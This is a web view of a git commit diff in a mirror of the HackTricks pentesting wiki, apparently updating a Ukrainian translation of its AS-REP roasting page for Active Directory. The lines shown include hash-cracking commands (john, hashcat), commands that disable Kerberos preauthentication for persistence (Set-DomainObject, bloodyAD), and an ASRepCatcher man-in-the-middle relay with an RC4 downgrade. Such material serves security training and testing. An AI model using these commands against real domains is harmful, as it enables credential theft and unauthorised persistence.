mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Translated ['src/windows-hardening/active-directory-methodology/asreproa
This commit is contained in:
		
							parent
							
								
									598d5bf218
								
							
						
					
					
						commit
						bd09f9abc3
					
				@ -40,7 +40,7 @@ Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github
 | 
				
			|||||||
john --wordlist=passwords_kerb.txt hashes.asreproast
 | 
					john --wordlist=passwords_kerb.txt hashes.asreproast
 | 
				
			||||||
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
 | 
					hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
 | 
				
			||||||
```
 | 
					```
 | 
				
			||||||
### Постійність
 | 
					### Persistence
 | 
				
			||||||
 | 
					
 | 
				
			||||||
Примусьте **preauth**, який не потрібен для користувача, де у вас є **GenericAll** дозволи (або дозволи на запис властивостей):
 | 
					Примусьте **preauth**, який не потрібен для користувача, де у вас є **GenericAll** дозволи (або дозволи на запис властивостей):
 | 
				
			||||||
```bash:Using Windows
 | 
					```bash:Using Windows
 | 
				
			||||||
@ -48,12 +48,12 @@ Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbos
 | 
				
			|||||||
```
 | 
					```
 | 
				
			||||||
 | 
					
 | 
				
			||||||
```bash:Using Linux
 | 
					```bash:Using Linux
 | 
				
			||||||
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
 | 
					bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH 'target_user'
 | 
				
			||||||
```
 | 
					```
 | 
				
			||||||
## ASREProast без облікових даних
 | 
					## ASREProast без облікових даних
 | 
				
			||||||
 | 
					
 | 
				
			||||||
Зловмисник може використовувати позицію "людина посередині", щоб захопити пакети AS-REP під час їх проходження через мережу, не покладаючись на відключення попередньої автентифікації Kerberos. Тому це працює для всіх користувачів у VLAN.\
 | 
					Зловмисник може використовувати позицію "людина посередині", щоб захопити пакети AS-REP, коли вони проходять через мережу, не покладаючись на відключення попередньої автентифікації Kerberos. Тому це працює для всіх користувачів у VLAN.\
 | 
				
			||||||
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) дозволяє нам це зробити. Більше того, інструмент змушує клієнтські робочі станції використовувати RC4, змінюючи переговори Kerberos.
 | 
					[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) дозволяє нам це зробити. Більше того, інструмент змушує робочі станції клієнтів використовувати RC4, змінюючи переговори Kerberos.
 | 
				
			||||||
```bash
 | 
					```bash
 | 
				
			||||||
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
 | 
					# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
 | 
				
			||||||
ASRepCatcher relay -dc $DC_IP
 | 
					ASRepCatcher relay -dc $DC_IP
 | 
				
			||||||
 | 
				
			|||||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user